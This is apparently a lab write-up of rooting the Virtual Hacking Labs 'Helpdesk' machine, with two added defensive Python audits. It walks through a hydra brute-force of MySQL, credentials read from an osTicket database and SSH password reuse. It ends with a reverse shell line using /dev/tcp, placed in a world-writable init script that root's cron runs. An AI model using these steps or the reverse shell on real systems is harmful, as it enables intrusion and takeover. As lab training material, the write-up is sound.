# VHL — Helpdesk

Web · Easy · Linux

FTP with anonymous access reveals helpdesk application credentials. SQL injection and file upload lead to remote code execution.

February 10, 2025 · Virtual Hacking Labs

#FTP #SQLi #FileUpload #RCE
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 18:55 EST
Nmap scan report for 10.11.1.11
Host is up (0.023s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0               6 Jun 09  2021 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 fd:67:8a:ee:2b:20:1f:c2:7c:40:4a:af:0e:78:a3:f1 (RSA)
|   256 d3:92:02:90:59:6b:ee:05:f4:6e:38:dd:4f:a7:35:b9 (ECDSA)
|_  256 97:62:5f:74:d9:20:39:f1:bd:9d:2b:56:cf:0e:45:2d (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Helpdesk
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
3306/tcp open  mysql   MySQL 5.6.51
| mysql-info:
|   Protocol: 10
|   Version: 5.6.51
|   Thread ID: 505
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, ODBCClient, FoundRows, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsCompression, Support41Auth, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, Speaks41ProtocolNew, SupportsLoadDataLocal, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: sJUNhBL;!3{7;cb@Y|)S
|_  Auth Plugin Name: mysql_native_password
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE
HOP RTT      ADDRESS
1   23.14 ms 10.11.1.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
```
## 21

```sh
21/tcp   open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0               6 Jun 09  2021 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:172.16.1.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
```

## 80

```sh
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Helpdesk
```

Can't register an account on the portal; registration requires confirmation.

## 111

```sh
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
```
## 3306

Bruteforcing MySQL:

```sh
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.11.1.11
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-10 19:29:03
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://10.11.1.11:3306/
[3306][mysql] host: 10.11.1.11   login: root   password: whatever
```
Creds:

```
root:whatever
```
## mysql

```sh
mysql -u root -p'whatever' -h 10.11.1.11
```

```sh
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| osticket           |
| performance_schema |
+--------------------+
4 rows in set (0.022 sec)

MySQL [(none)]> use osticket;
Database changed
```
```sh
MySQL [osticket]> show tables;
+--------------------------+
| Tables_in_osticket       |
+--------------------------+
| ost__search              |
| ost_api_key              |
| ost_attachment           |
| ost_canned_response      |
| ost_config               |
| ost_content              |
| ost_department           |
| ost_draft                |
| ost_email                |
| ost_email_account        |
| ost_email_template       |
| ost_email_template_group |
| ost_event                |
| ost_faq                  |
| ost_faq_category         |
| ost_faq_topic            |
| ost_file                 |
| ost_file_chunk           |
| ost_filter               |
| ost_filter_action        |
| ost_filter_rule          |
| ost_form                 |
| ost_form_entry           |
| ost_form_entry_values    |
| ost_form_field           |
| ost_group                |
| ost_help_topic           |
| ost_help_topic_form      |
| ost_list                 |
| ost_list_items           |
| ost_lock                 |
| ost_note                 |
| ost_organization         |
| ost_organization__cdata  |
| ost_plugin               |
| ost_queue                |
| ost_queue_column         |
| ost_queue_columns        |
| ost_queue_config         |
| ost_queue_export         |
| ost_queue_sort           |
| ost_queue_sorts          |
| ost_role                 |
| ost_schedule             |
| ost_schedule_entry       |
| ost_sequence             |
| ost_session              |
| ost_sla                  |
| ost_staff                |
| ost_staff_dept_access    |
| ost_syslog               |
| ost_task                 |
| ost_task__cdata          |
| ost_team                 |
| ost_team_member          |
| ost_thread               |
| ost_thread_collaborator  |
| ost_thread_entry         |
| ost_thread_entry_email   |
| ost_thread_entry_merge   |
| ost_thread_event         |
| ost_thread_referral      |
| ost_ticket               |
| ost_ticket__cdata        |
| ost_ticket_priority      |
| ost_ticket_status        |
| ost_translation          |
| ost_user                 |
| ost_user__cdata          |
| ost_user_account         |
| ost_user_email           |
+--------------------------+
71 rows in set (0.019 sec)
```
```sh
MySQL [osticket]> select * from ost_user_email;
+----+---------+-------+------------------------+
| id | user_id | flags | address                |
+----+---------+-------+------------------------+
|  1 |       1 |     0 | support@osticket.com   |
|  2 |       2 |     0 | helpdesk@localhost.com |
+----+---------+-------+------------------------+
```
```sh
MySQL [osticket]> select * from ost_user_account;
+----+---------+--------+----------+------+----------+--------------------------------------------------------------+---------+-------+---------------------+
| id | user_id | status | timezone | lang | username | passwd                                                       | backend | extra | registered          |
+----+---------+--------+----------+------+----------+--------------------------------------------------------------+---------+-------+---------------------+
|  1 |       2 |      1 | NULL     | NULL | NULL     | $2a$08$N1NqQ6q6N5o3cXdRSt7p4eGq3UuvEBY04nf7D1ZaK1A9wlALvB4XC | NULL    | NULL  | 2022-06-07 07:59:41 |
+----+---------+--------+----------+------+----------+--------------------------------------------------------------+---------+-------+---------------------+
1 row in set (0.023 sec)
```
```sh
MySQL [osticket]> select * from ost_staff;
+----------+---------+---------+----------+-----------+----------+--------------------------------------------------------------+---------+------------------------+-------+-----------+--------+-----------+------+----------+--------+-------+----------+---------+-----------+------------+---------------+-----------------------+---------------+---------------+-------------------+------------------------+--------------------+-----------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+---------------------+---------------------+---------------------+
| staff_id | dept_id | role_id | username | firstname | lastname | passwd | backend | email | phone | phone_ext | mobile | signature | lang | timezone | locale | notes | isactive | isadmin | isvisible | onvacation | assigned_only | show_assigned_tickets | change_passwd | max_page_size | auto_refresh_rate | default_signature_type | default_paper_size | extra | permissions | created | lastlogin | passwdreset | updated |
+----------+---------+---------+----------+-----------+----------+--------------------------------------------------------------+---------+------------------------+-------+-----------+--------+-----------+------+----------+--------+-------+----------+---------+-----------+------------+---------------+-----------------------+---------------+---------------+-------------------+------------------------+--------------------+-----------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+---------------------+---------------------+---------------------+
| 1 | 1 | 1 | helpdesk | John | Doe | $2a$08$WLIxqtBatS/omAFsAg2e.uOUckvy44GB/ONx2qpQv3pZx5QmDOrNi | NULL | helpdesk@localhost.com | | NULL | | | NULL | NULL | NULL | NULL | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 25 | 0 | none | Letter | {"browser_lang":"en_US","def_assn_role":true} | {"user.create":1,"user.delete":1,"user.edit":1,"user.manage":1,"user.dir":1,"org.create":1,"org.delete":1,"org.edit":1,"faq.manage":1,"visibility.agents":1,"emails.banlist":1,"visibility.departments":1} | 2022-06-07 04:31:24 | 2022-06-07 04:54:07 | 2022-06-07 11:08:51 | 2022-06-07 04:54:07 |
+----------+---------+---------+----------+-----------+----------+--------------------------------------------------------------+---------+------------------------+-------+-----------+--------+-----------+------+----------+--------+-------+----------+---------+-----------+------------+---------------+-----------------------+---------------+---------------+-------------------+------------------------+--------------------+-----------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+---------------------+---------------------+---------------------+
```

## ost_thread_entry
```sh
MySQL [osticket]> select * from ost_thread_entry ;
+----+-----+-----------+----------+---------+------+-------+------------------+--------+-------------+--------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------+-------------+-------+--------------------------------------------------+---------------------+---------------------+
| id | pid | thread_id | staff_id | user_id | type | flags | poster | editor | editor_type | source | title | body | format | ip_address | extra | recipients | created | updated |
+----+-----+-----------+----------+---------+------+-------+------------------+--------+-------------+--------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------+-------------+-------+--------------------------------------------------+---------------------+---------------------+
| 1 | 0 | 1 | 0 | 1 | M | 65 | osTicket Support | NULL | NULL | Web | osTicket Installed! | <p>Thank you for choosing osTicket. </p> <p>Please make sure you join the <a href="https://forum.osticket.com">osTicket forums</a> and our <a href="https://osticket.com">mailing list</a> to stay up to date on the latest news, security alerts and updates. The osTicket forums are also a great place to get assistance, guidance, tips, and help from other osTicket users. In addition to the forums, the osTicket wiki provides a useful collection of educational materials, documentation, and notes from the community. We welcome your contributions to the osTicket community. </p> <p>If you are looking for a greater level of support, we provide professional services and commercial support with guaranteed response times, and access to the core development team. We can also help customize osTicket or even add new features to the system to meet your unique needs. </p> <p>If the idea of managing and upgrading this osTicket installation is daunting, you can try osTicket as a hosted service at <a href="https://supportsystem.com">https://supportsystem.com/</a> -- no installation required and we can import your data! With SupportSystem's turnkey infrastructure, you get osTicket at its best, leaving you free to focus on your customers without the burden of making sure the application is stable, maintained, and secure. </p> <p>Cheers, </p> <p>-<br /> osTicket Team https://osticket.com/ </p> <p><strong>PS.</strong> Don't just make customers happy, make happy customers! </p> | html | 192.168.6.1 | NULL | NULL | 2022-06-07 04:31:24 | 0000-00-00 00:00:00 |
| 2 | 0 | 2 | 0 | 2 | M | 577 | helpdesk | NULL | NULL | Phone | NULL | <p>Hi,<br /></p> <p>The following url can be used to access the admin panel: http://10.11.1.11/scp. It will also allow you to enter your system account. Be sure to edit the passwords as soon as you are logged in.<br /></p> <p>Username: helpdesk<br />Password: helpdesk90621<br /></p> <p>Kind regards,<br />Helpdesk administration</p> | html | 192.168.6.1 | NULL | {"to":{"2":"helpdesk <helpdesk@localhost.com>"}} | 2022-06-07 09:09:16 | 0000-00-00 00:00:00 |
+----+-----+-----------+----------+---------+------+-------+------------------+--------+-------------+--------+---------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------+-------------+-------+--------------------------------------------------+---------------------+---------------------+
2 rows in set (0.023 sec)
```

Creds:

```
helpdesk:helpdesk90621
```
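The ticket body above carries a username and password in clear text inside the stored HTML, which is exactly what a periodic audit of the thread table should catch. The scanner below is an added example, not code from the writeup or from osTicket: it flattens the HTML body to lines, flags credential-looking `Username:`/`Password:` lines and redacts the values in its report. The sample rows are constructed from the message above, and the column names in `AUDIT_QUERY` are assumed from the schema listed in this writeup.

```python
import html
import re

# Constructed sample rows shaped like osTicket's ost_thread_entry (id, poster, body);
# the second one mirrors the helpdesk message found in the osticket database on this box.
SAMPLE_ENTRIES = [
    (1, "osTicket Support", "<p>Thank you for choosing osTicket. </p>"),
    (2, "helpdesk",
     "<p>Hi,<br /></p> <p>The following url can be used to access the admin panel: "
     "http://10.11.1.11/scp.<br /></p> <p>Username: helpdesk<br />Password: helpdesk90621<br /></p>"),
]

# Read-only query to pull the same three columns from a live osTicket database for an
# audit run (table/column names assumed from the schema shown in the writeup).
AUDIT_QUERY = "SELECT id, poster, body FROM ost_thread_entry WHERE body REGEXP 'pass(word|wd)'"

BREAK_RE = re.compile(r"<br\s*/?>|</p>", re.I)   # tags that end a visual line
TAG_RE = re.compile(r"<[^>]+>")                  # every other tag is dropped
CRED_RE = re.compile(r"^\s*(username|user|login|password|passwd|pwd)\s*[:=]\s*(\S+)", re.I)


def html_to_lines(body):
    """Turn a stored 'html'-format body into stripped, non-empty plain-text lines."""
    text = BREAK_RE.sub("\n", body)
    text = TAG_RE.sub("", text)
    return [ln.strip() for ln in html.unescape(text).splitlines() if ln.strip()]


def redact(value):
    """Keep two leading characters so a reviewer can match the finding, mask the rest."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def find_credential_leaks(entries):
    """Return one finding per credential-looking line across all thread entries."""
    findings = []
    for entry_id, poster, body in entries:
        for line in html_to_lines(body):
            m = CRED_RE.match(line)
            if m:
                findings.append({"id": entry_id, "poster": poster,
                                 "field": m.group(1).lower(), "value": redact(m.group(2))})
    return findings


if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_ENTRIES):
        print("entry %(id)s by %(poster)s leaks %(field)s=%(value)s" % f)
```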
## password reuse for ssh
```sh
ssh helpdesk@10.11.1.11
The authenticity of host '10.11.1.11 (10.11.1.11)' can't be established.
ED25519 key fingerprint is SHA256:Gke21VtlAns2IH9PifDktzL7ttO/vS/IYJuqu9ft1L4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.11.1.11' (ED25519) to the list of known hosts.
helpdesk@10.11.1.11's password: helpdesk90621
[helpdesk@localhost ~]$ whoami
helpdesk
```

## priv esc
```sh
[helpdesk@localhost home]$ uanme -a
-bash: uanme: command not found
[helpdesk@localhost home]$ uname -a
Linux localhost.localdomain 3.10.0-1160.66.1.el7.x86_64 #1 SMP Wed May 18 16:02:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
[helpdesk@localhost home]$ cat /etc/os-release
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
```
```sh
[helpdesk@localhost ~]$ wget http://172.16.1.1/linpeas.sh
[helpdesk@localhost ~]$ chmod +x linpeas.sh
```

## linpeas
```sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.10.0-1160.66.1.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-44) (GCC) ) #1 SMP Wed May 18 16:02:34 UTC 2022
lsb_release Not Found

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.23

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/helpdesk/.local/bin:/home/helpdesk/bin
```
## cronjob

```sh
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
* * * * * root service help start
```
```sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers

╔══════════╣ MySQL version
mysql  Ver 14.14 Distrib 5.6.51, for Linux (x86_64) using  EditLine wrapper
```
```sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
You have write privileges over /etc/init.d/help
You have write privileges over /etc/rc.d/init.d/help
You have write privileges over /etc/rc.d/init.d/help
```

Edit /etc/init.d/help with vi and add a reverse shell:
```sh
[helpdesk@localhost init.d]$ cat help
#!/bin/bash
#
# /etc/rc.d/init.d/backup
#
# Backup script on start and stop
# To be completed.
#
# chkconfig: 2345 20 80

# Source function library.
. /etc/init.d/functions

start() {
        echo "Starting help"
        bash -c 'bash -i >& /dev/tcp/172.16.1.1/4444 0>&1'
}

stop() {
        echo "Shutting down help"
}

case "$1" in
    start)
        start
        ;;
    stop)
        stop
        ;;
    *)
        echo "Usage: <servicename> {start|stop]"
        exit 1
        ;;
esac
exit $?
```

The cronjob runs every minute and invokes the start() function.
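From the defender's side, the root cause is an init script that root's cron invokes every minute while an unprivileged user can write to it. The audit below is an added example, not code from the writeup or from linpeas: it parses /etc/crontab-style entries, resolves the scripts root runs via `service NAME start` (or by absolute path), and reports any that are group- or world-writable or not owned by the trusted uid. It runs against a constructed temporary fixture rather than the real /etc/init.d; the `trusted_owner_uid` parameter and the fixture paths are assumptions.

```python
import os
import re
import stat
import tempfile

# Matches "service NAME start|stop|restart|reload" inside a cron command field.
SERVICE_RE = re.compile(r"\bservice\s+(\S+)\s+(?:start|stop|restart|reload)\b")


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines (user is the sixth field)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment, or an environment assignment such as PATH=
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]


def scripts_run_by_root(crontab_text, init_dir):
    """Resolve the init scripts that root's cron entries execute."""
    found = set()
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for name in SERVICE_RE.findall(command):
            found.add(os.path.join(init_dir, name))
        for tok in command.split():                 # direct /etc/init.d/NAME invocations
            if tok.startswith(init_dir + os.sep):
                found.add(tok)
    return found


def find_writable_cron_services(init_dir, crontab_text, trusted_owner_uid=0):
    """Report root-invoked init scripts that a non-root user could modify."""
    findings = []
    for path in sorted(scripts_run_by_root(crontab_text, init_dir)):
        if not os.path.exists(path):
            findings.append({"script": path, "reason": "missing"})
            continue
        st = os.stat(path)
        reasons = []
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_uid != trusted_owner_uid:
            reasons.append("owned by uid %d" % st.st_uid)
        if reasons:
            findings.append({"script": path, "reason": ", ".join(reasons)})
    return findings


def run_demo():
    """Constructed fixture mirroring the box: 'help' is world-writable, 'good' is not."""
    init_dir = tempfile.mkdtemp()
    for name, mode in (("help", 0o666), ("good", 0o755)):
        path = os.path.join(init_dir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(path, mode)
    crontab = ("SHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\n"
               "* * * * * root service help start\n*/5 * * * * root service good restart\n")
    # The fixture files are owned by whoever runs this, so treat that uid as trusted here.
    return find_writable_cron_services(init_dir, crontab, trusted_owner_uid=os.getuid())
```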
```sh
nc -lnvp 4444
listening on [any] 4444 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.11] 48650
bash: no job control in this shell
[root@localhost /]# whoami
whoami
root
[root@localhost /]# cat /root/key.txt
cat /root/key.txt
93jksdf8ujklfadki32k
[root@localhost /]# date
date
Mon Feb 10 21:36:52 EST 2025
```